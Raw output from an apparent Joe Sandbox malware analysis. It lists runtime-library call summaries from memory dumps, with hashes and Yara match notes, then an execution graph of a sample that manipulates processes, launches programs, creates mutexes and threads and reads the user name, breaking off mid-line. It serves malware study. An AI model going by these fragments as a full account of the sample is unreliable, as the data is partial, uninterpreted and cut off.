            • __lock.LIBCMT ref: 004039C8
            • InterlockedDecrement.KERNEL32(?), ref: 004039E5
            • InterlockedIncrement.KERNEL32(02131688), ref: 00403A10
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
            • String ID: psJ
            • API String ID: 4271482742-967521273
            • Opcode ID: f34a0bde194e30490b4586d2f4585c68c597c4face1b8f544ea13d29bb067f45
            • Instruction ID: c69ef31ce1ad5a47aed47af2125ec50191bb3060e3ef6ecb00e80176e56692ae
            • Opcode Fuzzy Hash: f34a0bde194e30490b4586d2f4585c68c597c4face1b8f544ea13d29bb067f45
            • Instruction Fuzzy Hash: DF01E172E05611EBC720AF26990A35E7FA4AB01715F05013BE804B32D1CBBC6A40DBDD
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
            • String ID:
            • API String ID: 3534693527-0
            • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction ID: f1f2e7b6bf48de0555e525f91356899842675658b82ad3f6ff1020886001b396
            • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction Fuzzy Hash: 9E31F472930332FADB216AE48C40B6E3795AF15B24F104215EE04EB2DDDB778648CAA1
            APIs
            • __getptd_noexit.LIBCMT ref: 022A66DD
              • Part of subcall function 022059BF: __calloc_crt.LIBCMT ref: 022059E2
              • Part of subcall function 022059BF: __initptd.LIBCMT ref: 02205A04
            • __calloc_crt.LIBCMT ref: 022A6700
            • __get_sys_err_msg.LIBCMT ref: 022A671E
            • __invoke_watson.LIBCMT ref: 022A673B
            • __get_sys_err_msg.LIBCMT ref: 022A676D
            • __invoke_watson.LIBCMT ref: 022A678B
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
            • String ID:
            • API String ID: 4066021419-0
            • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction ID: c8489bdc793fc658e68b208bc48ef2a2880bfaded466ea3937fbe2598ea3d231
            • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction Fuzzy Hash: 881104716303157BEF213EE5DC90BBA738DEF00B60F040062FE08A6A89E725DD008AE4
            APIs
            • __lock.LIBCMT ref: 00401033
              • Part of subcall function 00401A8F: __mtinitlocknum.LIBCMT ref: 00401AA5
              • Part of subcall function 00401A8F: __amsg_exit.LIBCMT ref: 00401AB1
              • Part of subcall function 00401A8F: EnterCriticalSection.KERNEL32(?,?,?,004027FD,00000004,004A6428,0000000C,004010BD,?,?,00000000), ref: 00401AB9
            • ___sbh_find_block.LIBCMT ref: 0040103E
            • ___sbh_free_block.LIBCMT ref: 0040104D
            • HeapFree.KERNEL32(00000000,?,004A6380,0000000C,004032FF,00000000,?,004035F5,?,00000001,?,?,00401A19,00000018,004A6408,0000000C), ref: 0040107D
            • GetLastError.KERNEL32(?,004035F5,?,00000001,?,?,00401A19,00000018,004A6408,0000000C,00401AAA,?,?,?,004027FD,00000004), ref: 0040108E
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
            • String ID:
            • API String ID: 2714421763-0
            • Opcode ID: 378823a915c619e234e02591c1b5be9f2000e7fac0b3a953e333f88bdaeccc55
            • Instruction ID: f7f24829b0529de3acd64ad561495d8e8474641607c128e66590ad654e87f3c3
            • Opcode Fuzzy Hash: 378823a915c619e234e02591c1b5be9f2000e7fac0b3a953e333f88bdaeccc55
            • Instruction Fuzzy Hash: E301A231A01301AADB307BB29D0AB9E3B649F01328F20413FF644B65E1DA7C89808B9C
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: D
            • API String ID: 2102423945-2746444292
            • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction ID: 301de54810c31be24a59d716ee03dbbba84d3442b61bf6bf11d4808cc8219667
            • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction Fuzzy Hash: 46E15C71D4021AEACF64DFA0CD89FEEB7B8BF04304F14416AEA19A7190EB746A45CF54
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: $$$(
            • API String ID: 2102423945-3551151888
            • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction ID: 4f98817a1097b19a137fbe0eebe44e50e69461f39cc32abeea6d558e2e64ee05
            • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction Fuzzy Hash: 5591CD70C40248DAEF20DFA0DC59BEEBBB9AF05304F244169D516772C1DBB65A48CFA5
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _wcsnlen
            • String ID: U
            • API String ID: 3628947076-3372436214
            • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
            • Instruction ID: 8a84c4f321372471aab42fae03b345c175c24b5c6a2a40ff11fee48e7a9d69cd
            • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
            • Instruction Fuzzy Hash: 3A2138322343097AEB009AE49CC9BBA73DDEB45350F900065F908C61D9FF71ED608EA4
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: p2Q
            • API String ID: 2102423945-1521255505
            • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction ID: 799e25064d7c509c7d4f5837477955cfcf8adce193352741c144d4d13266043f
            • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction Fuzzy Hash: 14F0ED78698751A5F7217790BC66B857E917B31B09F104088E1182E2E5D3FD238CA79A
            APIs
            • std::exception::exception.LIBCMT ref: 0222FBF1
              • Part of subcall function 0221169C: std::exception::_Copy_str.LIBCMT ref: 022116B5
            • __CxxThrowException@8.LIBCMT ref: 0222FC06
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
            • String ID: TeM$TeM
            • API String ID: 3662862379-3870166017
            • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction ID: c3618d79b97655c457622e59adfd07abc0706e08db108d7202a5bb1e62af9fda
            • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction Fuzzy Hash: F8D06775C0034CBBCB04EFA5D459CDDBBB9AA14344B40C466AA1897249EA74A3598FD4
            APIs
              • Part of subcall function 0220197D: __wfsopen.LIBCMT ref: 02201988
            • _fgetws.LIBCMT ref: 021ED15C
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: __wfsopen_fgetws
            • String ID:
            • API String ID: 853134316-0
            • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction ID: b34ae6501aef8d63486c80017912864abef5ea7e35e65642a3bda1bad6528d20
            • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction Fuzzy Hash: 4B91C5B1D4071ADBCF20DFA4DC857AFB7B9BF04304F140529E816A7281E775AA14CB95
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _malloc$__except_handler4_fprintf
            • String ID:
            • API String ID: 1783060780-0
            • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
            • Instruction ID: 35e9bd96cfcc1a57e4aa69fb27b1c2c9cce4f7a77bfa1c6d21e61caadc416628
            • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
            • Instruction Fuzzy Hash: D3A191B1C00248EBEF11EFE4DC59BDEBB76AF14308F140128D51676291D7BA5A48CFA6
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
            • String ID:
            • API String ID: 2974526305-0
            • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
            • Instruction ID: a390c4426557989c4d9801535889f15b720ef53e03b6f94ee2af08b8054b1c30
            • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
            • Instruction Fuzzy Hash: 24519370A20306DBDB258FF988C866EB7B5BF40324F14872AEC35962DAD7B09951CF40
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
            • String ID:
            • API String ID: 3016257755-0
            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction ID: 039ca46544a0acc8243a4e4f31dbd5c4d9169bd924f0fbd0238b5eba7d0d5c3f
            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction Fuzzy Hash: 4201663202025ABBCF125EC4CE01CEE3F63BB18344B488414FA185882AD337C5B6AB81
            APIs
            • ___BuildCatchObject.LIBCMT ref: 022A7A4B
              • Part of subcall function 022A8140: ___BuildCatchObjectHelper.LIBCMT ref: 022A8172
              • Part of subcall function 022A8140: ___AdjustPointer.LIBCMT ref: 022A8189
            • _UnwindNestedFrames.LIBCMT ref: 022A7A62
            • ___FrameUnwindToState.LIBCMT ref: 022A7A74
            • CallCatchBlock.LIBCMT ref: 022A7A98
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
            • String ID:
            • API String ID: 2901542994-0
            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction ID: aaae15195bfdaa13cc038a8a05ac384f7778c9835728a41c60797060b17584fc
            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction Fuzzy Hash: C8011732010209BBCF12AF95CC00EEEBBAAEF48754F148014F91865525C336E961DFA4
            APIs
            • GetFullPathNameA.KERNEL32(00000000,00000000,?,00000000), ref: 004A4C02
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004A4C1C
            • HeapDestroy.KERNEL32(00000000), ref: 004A4C38
            • CloseHandle.KERNEL32(00000000), ref: 004A4C3F
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: CloseDestroyEnvironmentFreeFullHandleHeapNamePathStrings
            • String ID:
            • API String ID: 3728440687-0
            • Opcode ID: 00a9834505464cf2729f54a6d646a669bc93123e0bb29e17edbe1a69c369bb39
            • Instruction ID: 6fee5c341abdc74afc32e8bb56ebb1a7f74908c956a49815e826c219f5def03a
            • Opcode Fuzzy Hash: 00a9834505464cf2729f54a6d646a669bc93123e0bb29e17edbe1a69c369bb39
            • Instruction Fuzzy Hash: AA018BB1105508AFDB10AB74EE8495F7BBCEBDE325B01057BF602D3151DA789D448B6C
            APIs
            • __getptd.LIBCMT ref: 00404104
              • Part of subcall function 0040330E: __getptd_noexit.LIBCMT ref: 00403311
              • Part of subcall function 0040330E: __amsg_exit.LIBCMT ref: 0040331E
            • __getptd.LIBCMT ref: 0040411B
            • __amsg_exit.LIBCMT ref: 00404129
            • __lock.LIBCMT ref: 00404139
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
            • String ID:
            • API String ID: 3521780317-0
            • Opcode ID: 8e4ddab6a90b4917264dc88f4efb226a24b089a1c8f28879e587f6b8858ddada
            • Instruction ID: 809a297cf50b41ecf1d4b7bac088b0458a1c5db437d6f029eb5e37a96366ea0c
            • Opcode Fuzzy Hash: 8e4ddab6a90b4917264dc88f4efb226a24b089a1c8f28879e587f6b8858ddada
            • Instruction Fuzzy Hash: CDF0F6B1A017009BD730BB76880A71E37A0AB80715F10413FE554BB2C2CB7C99418A9E

            Execution Graph

            Execution Coverage:2%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:35.4%
            Total number of Nodes:810
            Total number of Limit Nodes:89
            execution_graph 44673 423f84 44674 423f90 _setvbuf 44673->44674 44710 432603 GetStartupInfoW 44674->44710 44677 423f95 44712 4278d5 GetProcessHeap 44677->44712 44678 423fed 44679 423ff8 44678->44679 45042 42411a 58 API calls 3 library calls 44678->45042 44713 425141 44679->44713 44682 423ffe 44683 424009 __RTC_Initialize 44682->44683 45043 42411a 58 API calls 3 library calls 44682->45043 44734 428754 44683->44734 44686 424018 44687 424024 GetCommandLineW 44686->44687 45044 42411a 58 API calls 3 library calls 44686->45044 44753 43235f GetEnvironmentStringsW 44687->44753 44690 424023 44690->44687 44693 42403e 44694 424049 44693->44694 45045 427c2e 58 API calls 3 library calls 44693->45045 44763 4321a1 44694->44763 44698 42405a 44777 427c68 44698->44777 44701 424062 44702 42406d __wwincmdln 44701->44702 45047 427c2e 58 API calls 3 library calls 44701->45047 44783 419f90 44702->44783 44705 424081 44706 424090 44705->44706 45039 427f3d 44705->45039 45048 427c59 58 API calls _doexit 44706->45048 44709 424095 _setvbuf 44711 432619 44710->44711 44711->44677 44712->44678 45049 427d6c 36 API calls 2 library calls 44713->45049 44715 425146 45050 428c48 InitializeCriticalSectionAndSpinCount __mtinitlocknum 44715->45050 44717 42514b 44718 42514f 44717->44718 45052 4324f7 TlsAlloc 44717->45052 45051 4251b7 61 API calls 2 library calls 44718->45051 44721 425154 44721->44682 44722 425161 44722->44718 44723 42516c 44722->44723 45053 428c96 44723->45053 44726 4251ae 45061 4251b7 61 API calls 2 library calls 44726->45061 44729 42518d 44729->44726 44731 425193 44729->44731 44730 4251b3 44730->44682 45060 42508e 58 API calls 4 library calls 44731->45060 44733 42519b GetCurrentThreadId 44733->44682 44735 428760 _setvbuf 44734->44735 45073 428af7 44735->45073 44737 428767 44738 428c96 __calloc_crt 58 API calls 44737->44738 44739 428778 44738->44739 44740 4287e3 GetStartupInfoW 44739->44740 44741 428783 @_EH4_CallFilterFunc@8 _setvbuf 44739->44741 44747 4287f8 44740->44747 44750 428927 44740->44750 44741->44686 44742 4289ef 45082 4289ff LeaveCriticalSection _doexit 44742->45082 44744 428c96 __calloc_crt 58 API calls 44744->44747 44745 428974 GetStdHandle 44745->44750 44746 428987 GetFileType 44746->44750 44747->44744 44749 428846 44747->44749 44747->44750 44748 42887a GetFileType 44748->44749 44749->44748 44749->44750 45080 43263e InitializeCriticalSectionAndSpinCount 44749->45080 44750->44742 44750->44745 44750->44746 45081 43263e InitializeCriticalSectionAndSpinCount 44750->45081 44754 432370 44753->44754 44755 424034 44753->44755 45085 428cde 44754->45085 44759 431f64 GetModuleFileNameW 44755->44759 44757 432396 ___check_float_string 44758 4323ac FreeEnvironmentStringsW 44757->44758 44758->44755 44760 431f98 _wparse_cmdline 44759->44760 44761 428cde __malloc_crt 58 API calls 44760->44761 44762 431fd8 _wparse_cmdline 44760->44762 44761->44762 44762->44693 44764 4321ba __NMSG_WRITE 44763->44764 44768 42404f 44763->44768 44765 428c96 __calloc_crt 58 API calls 44764->44765 44773 4321e3 __NMSG_WRITE 44765->44773 44766 43223a 45124 420bed 58 API calls 2 library calls 44766->45124 44768->44698 45046 427c2e 58 API calls 3 library calls 44768->45046 44769 428c96 __calloc_crt 58 API calls 44769->44773 44770 43225f 45125 420bed 58 API calls 2 library calls 44770->45125 44773->44766 44773->44768 44773->44769 44773->44770 44774 432276 44773->44774 45123 42962f 58 API calls __cftoa_l 44773->45123 45126 4242fd 8 API calls 2 library calls 44774->45126 44776 432282 44779 427c74 __IsNonwritableInCurrentImage 44777->44779 45127 43aeb5 44779->45127 44780 427c92 __initterm_e 44782 427cb1 _doexit __IsNonwritableInCurrentImage 44780->44782 45130 4219ac 67 API calls __cinit 44780->45130 44782->44701 44784 419fa0 __ftell_nolock 44783->44784 45131 40cf10 44784->45131 44786 419fb0 44787 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44786->44787 44788 419fb4 44786->44788 44789 419fe4 GetLastError 44787->44789 44790 419fe6 44787->44790 45355 4124e0 109 API calls _memset 44788->45355 44789->44790 45145 41d3c0 44790->45145 44793 419fb9 44793->44705 44795 41a022 45148 41d340 44795->45148 44796 41b669 45436 44f23e 59 API calls 2 library calls 44796->45436 44798 41b673 45437 44f23e 59 API calls 2 library calls 44798->45437 44803 41a065 45153 413a90 44803->45153 44807 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44808 41a33d GlobalFree 44807->44808 44823 41a196 44807->44823 44809 41a354 44808->44809 44810 41a45c 44808->44810 44812 412220 76 API calls 44809->44812 45209 412220 44810->45209 44811 41a100 44811->44807 44814 41a359 44812->44814 44816 41a466 44814->44816 45224 40ef50 44814->45224 44815 41a1cc lstrcmpW lstrcmpW 44815->44823 44816->44705 44818 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44818->44823 44819 41a48f 44822 41a4ef 44819->44822 45229 413ea0 44819->45229 44821 420235 60 API calls _LanguageEnumProc@4 44821->44823 44825 411cd0 92 API calls 44822->44825 44823->44808 44823->44815 44823->44818 44823->44821 44824 41a361 44823->44824 45169 423c92 44824->45169 44827 41a563 44825->44827 44860 41a5db 44827->44860 45250 414690 44827->45250 44829 41a395 OpenProcess 44831 41a402 44829->44831 44832 41a3a9 WaitForSingleObject CloseHandle 44829->44832 45172 411cd0 44831->45172 44832->44831 44837 41a3cb 44832->44837 44833 41a6f9 45357 411a10 8 API calls 44833->45357 44834 41a5a9 44839 414690 59 API calls 44834->44839 44853 41a3e2 GlobalFree 44837->44853 44854 41a3d4 Sleep 44837->44854 45356 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44837->45356 44838 41a6fe 44841 41a8b6 CreateMutexA 44838->44841 44842 41a70f 44838->44842 44844 41a5d4 44839->44844 44840 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44845 41a451 44840->44845 44847 41a8ca 44841->44847 44846 41a7dc 44842->44846 44858 40ef50 58 API calls 44842->44858 45273 40d240 CoInitialize 44844->45273 44845->44705 44849 40ef50 58 API calls 44846->44849 44852 40ef50 58 API calls 44847->44852 44848 41a624 GetVersion 44848->44833 44850 41a632 lstrcpyW lstrcatW lstrcatW 44848->44850 44855 41a7ec 44849->44855 44856 41a674 _memset 44850->44856 44863 41a8da 44852->44863 44857 41a3f7 44853->44857 44854->44829 44859 41a7f1 lstrlenA 44855->44859 44862 41a6b4 ShellExecuteExW 44856->44862 44857->44705 44865 41a72f 44858->44865 44861 420c62 _malloc 58 API calls 44859->44861 44860->44833 44860->44838 44860->44841 44860->44848 44864 41a810 _memset 44861->44864 44862->44838 44884 41a6e3 44862->44884 44866 413ea0 59 API calls 44863->44866 44879 41a92f 44863->44879 44868 41a81e MultiByteToWideChar lstrcatW 44864->44868 44867 413ea0 59 API calls 44865->44867 44870 41a780 44865->44870 44866->44863 44867->44865 44868->44859 44869 41a847 lstrlenW 44868->44869 44871 41a8a0 CreateMutexA 44869->44871 44872 41a856 44869->44872 44873 41a792 44870->44873 44874 41a79c CreateThread 44870->44874 44871->44847 45359 40e760 95 API calls 44872->45359 45358 413ff0 59 API calls ___check_float_string 44873->45358 44874->44846 44878 41a7d0 44874->44878 45723 41dbd0 95 API calls 4 library calls 44874->45723 44877 41a860 CreateThread WaitForSingleObject 44877->44871 45724 41e690 203 API calls 8 library calls 44877->45724 44878->44846 45360 415c10 44879->45360 44881 41a98c 45375 412840 60 API calls 44881->45375 44883 41a997 45376 410fc0 93 API calls 4 library calls 44883->45376 44884->44705 44886 41a9ab 44887 41a9c2 lstrlenA 44886->44887 44887->44884 44889 41a9d8 44887->44889 44888 415c10 59 API calls 44890 41aa23 44888->44890 44889->44888 45377 412840 60 API calls 44890->45377 44892 41aa2e lstrcpyA 44895 41aa4b 44892->44895 44894 415c10 59 API calls 44896 41aa90 44894->44896 44895->44894 44897 40ef50 58 API calls 44896->44897 44898 41aaa0 44897->44898 44899 413ea0 59 API calls 44898->44899 44900 41aaf5 44898->44900 44899->44898 45378 413ff0 59 API calls ___check_float_string 44900->45378 44902 41ab1d 45379 412900 44902->45379 44904 40ef50 58 API calls 44906 41abc5 44904->44906 44905 41ab28 _memmove 44905->44904 44907 413ea0 59 API calls 44906->44907 44908 41ac1e 44906->44908 44907->44906 45384 413ff0 59 API calls ___check_float_string 44908->45384 44910 41ac46 44911 412900 60 API calls 44910->44911 44913 41ac51 _memmove 44911->44913 44912 40ef50 58 API calls 44914 41acee 44912->44914 44913->44912 44915 413ea0 59 API calls 44914->44915 44916 41ad43 44914->44916 44915->44914 45385 413ff0 59 API calls ___check_float_string 44916->45385 44918 41ad6b 44919 412900 60 API calls 44918->44919 44922 41ad76 _memmove 44919->44922 44920 415c10 59 API calls 44921 41ae2a 44920->44921 45386 413580 59 API calls 44921->45386 44922->44920 44924 41ae3c 44925 415c10 59 API calls 44924->44925 44926 41ae76 44925->44926 45387 413580 59 API calls 44926->45387 44928 41ae82 44929 415c10 59 API calls 44928->44929 44930 41aebc 44929->44930 45388 413580 59 API calls 44930->45388 44932 41aec8 44933 415c10 59 API calls 44932->44933 44934 41af02 44933->44934 45389 413580 59 API calls 44934->45389 44936 41af0e 44937 415c10 59 API calls 44936->44937 44938 41af48 44937->44938 45390 413580 59 API calls 44938->45390 44940 41af54 44941 415c10 59 API calls 44940->44941 44942 41af8e 44941->44942 45391 413580 59 API calls 44942->45391 44944 41af9a 44945 415c10 59 API calls 44944->44945 44946 41afd4 44945->44946 45392 413580 59 API calls 44946->45392 44948 41afe0 45393 413100 59 API calls 44948->45393 44950 41b001 45394 413580 59 API calls 44950->45394 44952 41b025 45395 413100 59 API calls 44952->45395 44954 41b03c 45396 413580 59 API calls 44954->45396 44956 41b059 45397 413100 59 API calls 44956->45397 44958 41b070 45398 413580 59 API calls 44958->45398 44960 41b07c 45399 413100 59 API calls 44960->45399 44962 41b093 45400 413580 59 API calls 44962->45400 44964 41b09f 45401 413100 59 API calls 44964->45401 44966 41b0b6 45402 413580 59 API calls 44966->45402 44968 41b0c2 45403 413100 59 API calls 44968->45403 44970 41b0d9 45404 413580 59 API calls 44970->45404 44972 41b0e5 45405 413100 59 API calls 44972->45405 44974 41b0fc 45406 413580 59 API calls 44974->45406 44976 41b108 44978 41b130 44976->44978 45407 41cdd0 59 API calls 44976->45407 44979 40ef50 58 API calls 44978->44979 44980 41b16e 44979->44980 44982 41b1a5 GetUserNameW 44980->44982 45408 412de0 59 API calls 44980->45408 44983 41b1c9 44982->44983 45409 412c40 44983->45409 44985 41b1d8 45416 412bf0 59 API calls 44985->45416 44987 41b1ea 45417 40ecb0 60 API calls 2 library calls 44987->45417 44989 41b2f5 45420 4136c0 59 API calls 44989->45420 44991 41b308 45421 40ca70 59 API calls 44991->45421 44993 41b311 45422 4130b0 59 API calls 44993->45422 44995 412c40 59 API calls 45010 41b1f3 44995->45010 44996 41b322 45423 40c740 120 API calls 4 library calls 44996->45423 44998 412900 60 API calls 44998->45010 44999 41b327 45424 4111c0 169 API calls 2 library calls 44999->45424 45002 41b33b 45425 41ba10 LoadCursorW RegisterClassExW 45002->45425 45004 41b343 45426 41ba80 CreateWindowExW ShowWindow UpdateWindow 45004->45426 45005 413100 59 API calls 45005->45010 45007 41b34b 45011 41b34f 45007->45011 45427 410a50 65 API calls 45007->45427 45010->44989 45010->44995 45010->44998 45010->45005 45418 413580 59 API calls 45010->45418 45419 40f1f0 